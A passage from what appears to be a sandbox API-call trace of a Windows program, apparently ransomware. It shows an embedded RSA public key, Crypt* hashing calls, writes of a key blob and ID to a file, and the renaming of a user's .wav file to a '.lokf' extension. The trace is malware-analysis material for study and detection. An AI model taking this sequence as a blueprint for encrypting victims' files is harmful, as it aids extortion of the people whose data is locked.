KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.467] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.467] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.467] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8698) returned 1 [0060.467] CryptCreateHash (in: hProv=0x6b8698, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.467] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.467] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.467] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.467] GetLastError () returned 0x0 [0060.468] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.468] CryptReleaseContext (hProv=0x6b8698, dwFlags=0x0) returned 1 [0060.468] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.468] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.468] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.468] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.468] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.468] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.468] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0060.468] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85e48 | out: hHeap=0x660000) returned 1 [0060.468] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85e60 | out: hHeap=0x660000) returned 1 [0060.468] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0060.468] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0060.468] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0060.468] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0060.468] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278ec0 [0060.468] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85e60 [0060.468] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0060.468] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c85e48 [0060.468] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0060.468] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0060.468] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0060.468] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0060.469] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0060.469] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0060.469] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0060.469] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0060.469] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.469] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85e60 | out: hHeap=0x660000) returned 1 [0060.469] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0060.469] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85e48 | out: hHeap=0x660000) returned 1 [0060.469] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0060.469] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0060.469] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0060.469] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.469] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0060.469] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.469] GetCurrentThreadId () returned 0x9e0 [0060.469] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0060.469] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c8ac70 [0060.469] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0060.469] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.469] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0060.469] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0060.469] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0060.469] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0060.469] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.469] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.469] GetCurrentThreadId () returned 0x9e0 [0060.469] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.469] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.469] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0060.469] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.469] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.469] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.469] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.469] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0060.470] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0060.470] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0060.470] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0060.470] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0060.470] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326fa10 [0060.470] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.470] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0060.470] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.470] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.470] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0060.470] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0060.470] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0060.470] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0060.470] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0060.470] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0060.470] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85e48 [0060.470] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0060.470] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f00 [0060.470] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.470] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.470] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0060.470] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0060.470] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0060.470] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85e60 [0060.470] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0060.470] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0060.470] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0060.470] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85e30 [0060.470] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0060.470] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857b8 [0060.470] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.470] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f30 [0060.470] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0060.470] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0060.470] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.470] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857e8 [0060.471] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0060.471] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85e78 [0060.471] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.471] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857d0 [0060.471] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857e8 | out: hHeap=0x660000) returned 1 [0060.471] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0060.471] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0060.471] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0060.471] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0060.471] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0060.471] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85e48 | out: hHeap=0x660000) returned 1 [0060.471] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85e48 [0060.471] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0060.471] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0060.471] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0060.471] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0060.471] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.471] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x326a370 [0060.471] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.471] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3234418 [0060.471] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0060.471] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0060.471] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85e48 | out: hHeap=0x660000) returned 1 [0060.471] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x326a588 [0060.471] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0060.471] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0060.471] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0060.472] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.472] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0060.472] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0060.472] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0060.472] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0060.472] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0060.472] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a588 | out: hHeap=0x660000) returned 1 [0060.472] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.472] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0060.472] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85e78 | out: hHeap=0x660000) returned 1 [0060.472] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0060.472] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.472] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0060.472] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85e60 | out: hHeap=0x660000) returned 1 [0060.472] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85e30 | out: hHeap=0x660000) returned 1 [0060.472] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0060.472] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0060.472] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0060.472] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85e18 | out: hHeap=0x660000) returned 1 [0060.472] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c89448 | out: hHeap=0x660000) returned 1 [0060.472] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.472] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326fa10 | out: hHeap=0x660000) returned 1 [0060.472] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0060.472] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0060.472] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0060.472] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0060.472] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0060.472] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0060.472] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.472] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0060.472] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0060.472] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c8bae8*, nNumberOfBytesToWrite=0xebf9, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c8bae8*, lpNumberOfBytesWritten=0x9f4fb14*=0xebf9, lpOverlapped=0x0) returned 1 [0060.473] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c8bae8 | out: hHeap=0x660000) returned 1 [0060.473] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xebfe, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.473] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f800*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f800*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.473] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0060.473] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bba0 [0060.473] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x326a370 [0060.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x326a370, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0060.473] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x32947b0 [0060.473] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0060.473] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bba0 | out: hHeap=0x660000) returned 1 [0060.473] WriteFile (in: hFile=0x5cc, lpBuffer=0x32947b0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x32947b0*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0060.473] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0060.473] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.473] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.473] CloseHandle (hObject=0x5cc) returned 1 [0060.474] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262c78 [0060.474] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8a0) returned 0x3268798 [0060.474] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262c78 | out: hHeap=0x660000) returned 1 [0060.474] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\-Y1PqBS8_MAyXOFE\\yLAA3zbV.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\eiv9rdb\\-y1pqbs8_mayxofe\\ylaa3zbv.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\-Y1PqBS8_MAyXOFE\\yLAA3zbV.wav.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\eiv9rdb\\-y1pqbs8_mayxofe\\ylaa3zbv.wav.lokf")) returned 1 [0060.475] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.475] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.475] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.476] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228c60 | out: hHeap=0x660000) returned 1 [0060.476] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5d27f00, ftCreationTime.dwHighDateTime=0x1d4cf37, ftLastAccessTime.dwLowDateTime=0xdf5db3a0, ftLastAccessTime.dwHighDateTime=0x1d4d388, ftLastWriteTime.dwLowDateTime=0xdf5db3a0, ftLastWriteTime.dwHighDateTime=0x1d4d388, nFileSizeHigh=0x0, nFileSizeLow=0xebfe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yLAA3zbV.wav", cAlternateFileName="")) returned 0 [0060.476] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0060.476] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0060.476] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8720 | out: hHeap=0x660000) returned 1 [0060.476] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0060.476] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8720 [0060.476] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0060.476] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.476] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.476] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.476] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.476] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.476] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.476] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.476] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.476] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.476] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.476] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.477] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.477] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.477] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.477] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.477] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.477] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.477] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.477] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.477] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: 